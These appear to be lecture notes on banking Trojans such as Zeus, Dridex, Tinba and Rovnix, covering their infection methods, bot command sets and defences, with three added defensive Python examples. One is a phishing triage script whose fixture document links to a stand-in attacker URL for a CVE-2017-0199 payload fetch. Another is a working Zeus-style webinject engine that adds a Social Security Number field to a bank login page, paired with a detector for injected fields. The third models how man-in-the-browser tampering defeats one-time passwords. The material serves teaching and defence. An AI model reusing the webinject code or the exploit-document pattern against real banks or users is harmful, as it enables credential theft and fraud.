
• Man in the browser is a security attack where the perpetrator installs a Trojan horse on a victim's computer that is capable of modifying that user's Web transactions as they occur, in real time.
• Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. The data can then be retrieved by the person operating the logging program.
• Form grabbing is a form of malware that works by retrieving authorization and log-in credentials from a web data form before it is passed over the Internet to a secure server. Because the capture happens inside the browser, before the data is encrypted, HTTPS does not protect the credentials.
ZEUS
• Trojan horse malware package that runs on versions of Microsoft Windows.
• It is often used to steal banking information by man-in-the-browser attacks, keystroke logging and form grabbing.
• Zeus is spread mainly through drive-by downloads and phishing schemes.
• First identified in July 2007, when it was used to steal information from the United States Department of Transportation.
• It creates a botnet, a network of compromised machines that are covertly controlled by a command and control server under the control of the malware's owner. A botnet allows the owner to collect massive amounts of information or execute large-scale attacks.
• Zeus also acts as a financial services Trojan designed to steal banking credentials from the machines it infects. It accomplishes this through website monitoring and keylogging; the Trojan can get around the security in place on these websites because the keystrokes required for logging in are recorded as the user enters them.
• The spam messages often come in the form of email, but there have been social media campaigns designed to spread the malware through messages and postings on social media sites. Once users click on a link in the email or message, they are directed to a website that automatically installs the malware.
• Drive-by downloads happen when the attackers are able to compromise legitimate websites, inserting their malicious code into a website that the user trusts. The malware then installs itself when the user visits the website or when the user downloads and installs a seemingly benign program.
• How to Protect Yourself
• Prevention through safe Internet practices is always the first step in staying safe from the Zeus malware. This means avoiding potentially dangerous websites, such as those offering pirated software, adult material or illegal downloads, as the owners of these types of websites often have no problem allowing malware owners to host their software on the site. Being safe also means not clicking on links in email or social media messages unless you were expecting the message. Remember: even if the message is from a trusted source, if that source is infected with Zeus, the message could still be malicious.
• Staying safe also means being careful when interacting with financial institutions online. Two-factor authentication, where the website sends a confirmation code to a mobile device to confirm the login, is a must. Remember, though, that some offshoots of Zeus have also infected mobile devices, so this kind of authentication shouldn't be seen as a cure-all.
• A powerful, updated antivirus solution is a must. These solutions not only help protect you from visiting unsafe websites where you might find the Trojan, but can detect the Trojan when it downloads, tries to install or tries to run. Additionally, they can scan your system and remove the malware if it already exists on your machine.
• While there are a number of antivirus solutions out there, including a number that offer a free trial period, it's important to choose one from a leader in the industry that updates its solutions constantly. The fact that the Zeus source code is public means that there will be no end to the damage this malware can do, and every few years you can expect new versions of the malware to arise. Only a security vendor that is constantly vigilant against new threats can protect you from the Zeus Trojan in the future.
NEVERQUEST
• NeverQuest is a type of malicious software, or malware, known as a banking Trojan.
• It can be introduced to victims' computers through social media websites, phishing emails, or file transfers. Once installed on a victim's computer, NeverQuest is able to identify when the victim attempts to log onto an online banking website and transfers the victim's login credentials, including username and password, back to a computer server used to administer the NeverQuest malware.
• Once surreptitiously installed, NeverQuest enables its administrators to remotely control a victim's computer and log into the victim's online banking or other financial accounts, transfer money to other accounts, change login credentials, write online checks, and purchase goods from online vendors.
• HACKERS: RUSSIAN
• MOST AFFECTED COUNTRY: GERMANY
• Commands the bot accepts from its control server include:
• Downloading and running executable files
• Stealing cookie files
• Stealing certificates from the operating system store
• Getting the list of running processes
• Clearing the browser cache folder and deleting cookie files
• Removing copies of malware files
• Starting and stopping a SOCKS proxy server
• Starting and stopping a VNC remote access server
• Downloading and running updates of the malware (with or without restarting the computer)
• Running commands via ShellExecute()
• Deleting Registry entries
• Stealing passwords stored in FTP clients
• Deleting information about copies of the malware from the Registry
• Copying files (specified via pattern mask) from an infected computer
• Viewing the user’s web history
• Secretly recording video and sending recorded video to the cybercriminals’ server
• Getting video files by their number
• Deleting video files by their number
GOZI
• Gozi is spyware that monitors network traffic. It also harvests login credentials stored in browsers and mail applications, has screen capture and keylogging functions, and uses a rootkit component to hide its processes, files and registry information.
• Gozi V3 is distributed via spam mails that link to a malicious file, such as an obfuscated Visual Basic script, which acts as a dropper component. The dropper downloads and executes an executable with a valid digital signature.
DRIDEX
• Actors typically distribute Dridex malware through phishing e-mail spam campaigns. Phishing messages employ a combination of legitimate business names and domains, professional terminology, and language implying urgency to persuade victims to open attachments. Sender e-mail addresses can simulate individuals (name@domain.com), administrative accounts (admin@domain.com, support@domain.com), or common "do not reply" local parts (noreply@domain.com). Subject and attachment titles can include typical terms such as "invoice", "order", "scan", "receipt", "debit note", "itinerary", and others.
• Recent versions of Dridex exploit CVE-2017-0199, a remote code execution vulnerability specific to Microsoft Office and WordPad. Microsoft released a patch for it in 2017.
RAMNIT
• The first Ramnit variants, which emerged in 2010, were file-infecting viruses that infected EXE, DLL and HTML files found on the computer. Later variants included the ability to steal confidential data from the infected machine.
• At its peak in 2015, Ramnit was estimated to have infected 3,200,000 PCs.[3] Ramnit infects removable media such as USB drives and also hides itself within the master boot record.[4][5]
GOZNYM
• The criminal network used GozNym malware in an attempt to steal an estimated $100 million from more than 41,000 victims, primarily businesses and their financial institutions.
• Spammers were employed to create and send hundreds of thousands of phishing emails. The emails, designed to look like legitimate business correspondence, encouraged the recipient to click on a malicious link or file attachment. Word .doc attachments with encrypted VBA macros are, surprisingly, still an effective technique. If the social engineering trick worked, the victim's machine was redirected to a server that dropped the GozNym malware.
• The purpose of the GozNym malware is to capture victims' banking login credentials and deliver them to the gang, who would then use the captured credentials to fraudulently gain access to victims' accounts. The stolen funds were then laundered through U.S. and foreign bank accounts controlled by the criminals.
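The Dridex and GozNym slides describe the same lure: a business-looking e-mail with a generic sender, an "invoice"-style subject and an Office attachment that either carries VBA macros or exploits CVE-2017-0199. The following added example (not text from the slides and not code from either malware family) turns those traits into a small triage routine over RFC 822 messages. The sender local parts and subject terms are the ones the Dridex slide lists; the CVE-2017-0199 check looks for an oleObject relationship with TargetMode="External" in the document's .rels part, which is how such documents reference the remote payload. Every message and document in the block is constructed for the demo.

```python
"""Triage of a phishing e-mail carrying an Office attachment.

Added example, not code from the slides or from any malware family described
on them. It checks for the lure and attachment traits the Dridex and GozNym
sections describe: generic sender local parts, invoice-style subjects, VBA
macros in the attachment, and the external OLE link that CVE-2017-0199 exploit
documents carry. Every message and document below is constructed for the demo.
"""
import email
import email.utils
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

# Lure vocabulary from the Dridex description; local parts are the ones the slides list.
LURE_SUBJECT_TERMS = ("invoice", "order", "scan", "receipt", "debit note", "itinerary")
GENERIC_LOCAL_PARTS = {"admin", "support", "noreply", "no-reply", "donotreply"}
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def has_vba_macros(doc: bytes) -> bool:
    """OOXML files are zip containers; VBA code lives in word/vbaProject.bin."""
    try:
        with zipfile.ZipFile(io.BytesIO(doc)) as zf:
            return any(name.lower().endswith("vbaproject.bin") for name in zf.namelist())
    except zipfile.BadZipFile:
        return False


def has_external_ole_link(doc: bytes) -> bool:
    """CVE-2017-0199 documents pull their payload through an oleObject
    relationship whose TargetMode is External (a URL instead of an embedded part)."""
    try:
        with zipfile.ZipFile(io.BytesIO(doc)) as zf:
            rels = zf.read("word/_rels/document.xml.rels").decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError):
        return False
    for match in re.finditer(r"<Relationship\b[^>]*>", rels):
        tag = match.group(0)
        if OLE_REL_TYPE in tag and 'TargetMode="External"' in tag:
            return True
    return False


def triage(raw: bytes) -> list:
    """Return the indicators found in one RFC 822 message, in a stable order."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = []
    sender = email.utils.parseaddr(msg.get("From", ""))[1]
    local = sender.split("@")[0].lower()
    if local in GENERIC_LOCAL_PARTS:
        found.append("generic-sender:" + local)
    subject = str(msg.get("Subject", "")).lower()
    for term in LURE_SUBJECT_TERMS:
        if term in subject:
            found.append("lure-subject:" + term)
            break
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        data = part.get_payload(decode=True) or b""
        if name.endswith((".doc", ".docm", ".docx", ".rtf")):
            found.append("office-attachment:" + name)
        if has_vba_macros(data):
            found.append("vba-macros:" + name)
        if has_external_ole_link(data):
            found.append("external-ole-link:" + name)
    return found


# --- constructed samples -------------------------------------------------
def build_docx(parts: dict) -> bytes:
    """Minimal OOXML-shaped zip from {part name: bytes}; not a real Word file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()


MACRO_DOC = build_docx({"word/document.xml": b"<w:document/>",
                        "word/vbaProject.bin": b"\xd0\xcf\x11\xe0 constructed stub"})
EXPLOIT_DOC = build_docx({"word/document.xml": b"<w:document/>",
                          "word/_rels/document.xml.rels":
                          b'<Relationships><Relationship Id="rId5" Type="' + OLE_REL_TYPE.encode()
                          + b'" Target="http://attacker.example/update.hta" TargetMode="External"/>'
                          b"</Relationships>"})
CLEAN_DOC = build_docx({"word/document.xml": b"<w:document/>"})


def build_message(sender: str, subject: str, filename: str, attachment: bytes) -> bytes:
    """Constructed lure message with one attachment."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = sender, "accounts@victim.example", subject
    msg.set_content("Please find the attached document.")
    msg.add_attachment(attachment, maintype="application", subtype="octet-stream", filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    for args in (("noreply@supplier.example", "Invoice 84321 overdue", "invoice.docm", MACRO_DOC),
                 ("alice@partner.example", "Scan from MFP", "scan.docx", EXPLOIT_DOC),
                 ("alice@partner.example", "Lunch?", "notes.docx", CLEAN_DOC)):
        print(args[2], "->", triage(build_message(*args)))
```

The macro check only covers the OOXML container; a legacy binary .doc keeps its VBA in an OLE "Macros" storage and needs an OLE parser instead. A single indicator is weak on its own (plenty of real invoices arrive from noreply@ addresses); the point is that the combination the slides describe is cheap to score at the mail gateway before a user ever sees the attachment.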
TINBA
• Tiny Banker Trojan, also called Tinba, is a malware program that targets financial institution websites. It uses man-in-the-browser attacks and network sniffing. Since its discovery, it has been found targeting major banking institutions in the United States, including TD Bank, Chase, HSBC and Wells Fargo.
• Tinba is used to steal users' sensitive data, such as account login information and banking codes. It uses packet sniffing, a method of reading network traffic, to determine when a user navigates to a banking website, and then launches one of two different actions, depending on the variant.
• In its most popular form, it mounts a man-in-the-middle attack: the Trojan uses form grabbing to capture keystrokes and sends them to a Command & Control server, which compromises the user's information.
• The second method Tinba has used is to let the user log into the web page. Once the user is in, the malware extracts the company's logo and site formatting and creates a pop-up page, styled like the bank's site, requesting additional information such as social security numbers.[4] Most banking institutions tell users that they never ask for this information, as a way to defend against these types of attacks. Tinba has since been modified and has begun asking users for the type of information used in security questions, allowing the attacker to use it to reset the password at a later time.[5]
• Tinba attaches itself to other system processes in an attempt to convert the host machine into a zombie (a member of the attacker's botnet). To maintain its connection to the botnet, Tinba is coded with four domains, so if one goes down the Trojan can look for one of the others immediately.[6]
GOOTKIT
• The Gootkit banking Trojan was discovered back in 2014. It utilizes the Node.js runtime to perform a range of malicious tasks, from website injections and password grabbing all the way up to video recording and remote VNC capabilities.
• Gootkit's main functions are focused on stealing data from browsers. It can extract and exfiltrate data such as browsing history, passwords, and cookie files, and supports extracting this information from multiple browser types, from Chrome to Internet Explorer.
• Furthermore, Gootkit can also log what users enter into web forms.
• It was earlier used for banking fraud.
QADARS
• Qadars is a sophisticated and dangerous Trojan used for crimeware-related activities including banking fraud and credential theft. Qadars reaches users through exploit kits and is installed using PowerShell scripts.
• Qadars targets multiple well-known banks in the UK and Canada and is capable of stealing infected users' two-factor authentication codes and banking credentials through the deployment of webinjects.
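The page tampering described for Zeus, Tinba and Qadars is driven by a webinject rule file: the Trojan sits in the browser, matches the URL being loaded, and splices extra HTML into the bank's response before the page is rendered, so the bank's TLS connection never sees a difference. The following added example (not text from the slides and not any Trojan's code) implements the set_url / data_before / data_inject / data_after / data_end rule format that Zeus introduced and later families reused, applies one rule to a constructed login page, and then runs the kind of field-integrity check an anti-webinject script can perform by comparing what the bank served with what the user is shown. The bank URL, page, rule and injected field are all constructed for the demo.

```python
"""Applying a Zeus-style webinject to a login page, and a field-integrity check.

Added example, not code from the slides or from any Trojan. The rule format is
the set_url / data_before / data_inject / data_after / data_end syntax of Zeus
webinject configs; the bank page, URL and injected field are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class Inject:
    url_mask: str   # set_url mask, '*' is a wildcard
    flags: str      # G = apply on GET, P = apply on POST
    before: str = ""
    inject: str = ""
    after: str = ""


def parse_webinject_config(text: str) -> list:
    """Parse a rule file into Inject objects; each data_* section ends at data_end."""
    rules, current, section, buf = [], None, None, []
    for line in text.splitlines():
        if line.startswith("set_url "):
            parts = line.split(None, 2)
            current = Inject(url_mask=parts[1], flags=parts[2] if len(parts) > 2 else "")
            rules.append(current)
        elif line in ("data_before", "data_inject", "data_after"):
            section, buf = line[len("data_"):], []
        elif line == "data_end" and current is not None and section:
            setattr(current, section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(line)
    return rules


def _wild(pattern: str) -> str:
    """Zeus masks use '*' as a wildcard; everything else is literal."""
    return ".*?".join(re.escape(p) for p in pattern.split("*"))


def url_matches(mask: str, url: str) -> bool:
    return re.fullmatch(_wild(mask), url) is not None


def apply_injects(rules: list, url: str, method: str, html: str) -> str:
    """Rewrite the server's HTML the way the Trojan does before the browser renders it.
    With data_after set, the text between before and after is replaced by inject;
    without it, inject is appended right after the before match."""
    for rule in rules:
        if method[0].upper() not in rule.flags or not url_matches(rule.url_mask, url):
            continue
        m = re.search(_wild(rule.before), html, re.S)
        if not m:
            continue
        if rule.after:
            m2 = re.search(_wild(rule.after), html[m.end():], re.S)
            if not m2:
                continue
            html = html[:m.end()] + rule.inject + html[m.end() + m2.start():]
        else:
            html = html[:m.end()] + rule.inject + html[m.end():]
    return html


INPUT_NAME = re.compile(r"<input\b[^>]*\bname=[\"']([^\"']+)[\"']", re.I)


def unexpected_fields(served_html: str, rendered_html: str) -> list:
    """Anti-webinject check: input names the user sees that the bank never served."""
    expected = set(INPUT_NAME.findall(served_html))
    return [n for n in INPUT_NAME.findall(rendered_html) if n not in expected]


# --- constructed sample: what the bank served, and the Trojan's rule -------
BANK_LOGIN = """<form action="/login" method="post">
<label>User ID</label><input name="userid">
<label>Password</label><input type="password" name="passwd">
<button>Sign in</button>
</form>"""

CONFIG = """set_url https://bank.example/login* GP
data_before
<input type="password"*>
data_end
data_inject

<label>Social Security Number</label><input name="ssn">
data_end
data_after
data_end
"""


def demo() -> list:
    """Apply the rule and report which fields the user sees that the bank never served."""
    rules = parse_webinject_config(CONFIG)
    rendered = apply_injects(rules, "https://bank.example/login", "GET", BANK_LOGIN)
    return unexpected_fields(BANK_LOGIN, rendered)


if __name__ == "__main__":
    print(demo())
```

The integrity check has to run somewhere the Trojan cannot reach: a script delivered in the page runs in the same hooked browser and can itself be patched out, which is why bank-side anti-webinject products also compare submitted field sets server-side and flag a login POST that contains a field the form never had.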
ROVNIX
• Rovnix is considered a serious threat to the banking industry.
• Threat actors used high-quality, crafted Japanese-language emails that include ZIP files containing fake invoices and Rovnix, a crimeware kit very popular in the criminal underground.
• The ZIP files seemingly come from .ru domains (Russia); when a victim opens an invoice, it triggers the malware's execution. The malicious code is able to inject JavaScript into the login form used by 14 Japanese banks. Attackers use the code to mount a man-in-the-middle attack while users are trying to access their bank accounts, and the scripts are also able to defeat two-factor authentication.
• In some cases, the experts found Rovnix instructing victims to download an Android app onto a mobile device. That malicious app contains the Rovnix component for SMS hijacking, which listens for incoming SMS messages containing transaction authorization codes from the bank.
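The "2FA is not a cure-all" caveat in the Zeus protection slide and the SMS-hijacking component described for Rovnix point at the same weakness: a code that only proves the user is present says nothing about which transaction is being approved, and a code delivered to the same phone the attacker controls is simply relayed. The added example below (not from the slides, and not any Trojan's code) models a bank verifying an RFC 4226 HOTP code, once as a plain login OTP and once bound to the amount and beneficiary, against a simulated webinject that rewrites the transfer after the user confirms it. The shared secret, account identifiers and the tamper function are constructed.

```python
"""Why a login OTP does not stop a man-in-the-browser transfer.

Added example, not code from the slides or from any of the Trojans described.
It models one account with a shared HOTP secret (RFC 4226) and compares a plain
6-digit OTP with a code "dynamically linked" to the amount and beneficiary. The
webinject is simulated by a function that alters the transfer after the user
confirmed it. Secret, account numbers and amounts are constructed.
"""
import hashlib
import hmac
import struct
from dataclasses import dataclass

SECRET = b"constructed-shared-secret-for-demo"  # provisioned to the user's device and the bank


@dataclass(frozen=True)
class Transfer:
    amount_cents: int
    beneficiary: str  # destination account (constructed value)


def hotp(secret: bytes, counter: int, extra: bytes = b"", digits: int = 6) -> str:
    """RFC 4226 HOTP. With extra == b"" this is the standard algorithm; `extra` is
    appended to the counter so the code can be bound to transaction data."""
    mac = hmac.new(secret, struct.pack(">Q", counter) + extra, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(binary % 10 ** digits).zfill(digits)


def bind(tx: Transfer) -> bytes:
    """Canonical encoding of what the code is meant to authorize."""
    return f"{tx.amount_cents}|{tx.beneficiary}".encode()


def user_confirms(tx: Transfer, counter: int, bound: bool) -> str:
    """Code produced on the user's side for the transfer the user actually saw."""
    return hotp(SECRET, counter, bind(tx) if bound else b"")


def webinject_tamper(tx: Transfer) -> Transfer:
    """Simulated MitB: the browser keeps showing `tx`, but submits a mule transfer."""
    return Transfer(amount_cents=tx.amount_cents * 100, beneficiary="MULE-ACCOUNT-0001")


def bank_accepts(submitted: Transfer, code: str, counter: int, bound: bool) -> bool:
    """The bank recomputes the code over the transfer it actually received."""
    expected = hotp(SECRET, counter, bind(submitted) if bound else b"")
    return hmac.compare_digest(expected, code)


def run_scenarios(counter: int = 7) -> dict:
    """Three outcomes for the same tampered transfer."""
    intended = Transfer(amount_cents=5_000, beneficiary="VICTIM-SAVINGS-0042")
    tampered = webinject_tamper(intended)
    results = {}
    # 1. Plain OTP: the code says nothing about the transfer, so the bank
    #    accepts the mule transfer with the code the user typed for the real one.
    results["plain_otp_mitb"] = bank_accepts(
        tampered, user_confirms(intended, counter, False), counter, False)
    # 2. Code bound to amount and beneficiary, computed on a separate device
    #    from what the user saw: recomputation over the mule transfer fails.
    results["bound_code_mitb"] = bank_accepts(
        tampered, user_confirms(intended, counter, True), counter, True)
    # 3. Bound code generated by the bank for the *submitted* transfer and sent
    #    by SMS: an SMS-hijacking app on the same phone relays it, so binding
    #    alone does not help when the second factor shares the attacker's channel.
    sms_code = hotp(SECRET, counter, bind(tampered))
    results["bound_code_sms_hijack"] = bank_accepts(tampered, sms_code, counter, True)
    return results


if __name__ == "__main__":
    for name, accepted in run_scenarios().items():
        print(f"{name:24s} -> {'ACCEPTED' if accepted else 'rejected'}")
```

Scenario 3 is the Rovnix case: the bank's SMS does carry the real amount and beneficiary, but the hijacking app suppresses it and forwards the code, so the only remaining defence is a confirmation device the Trojan cannot also infect, displaying the transaction it is about to sign.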
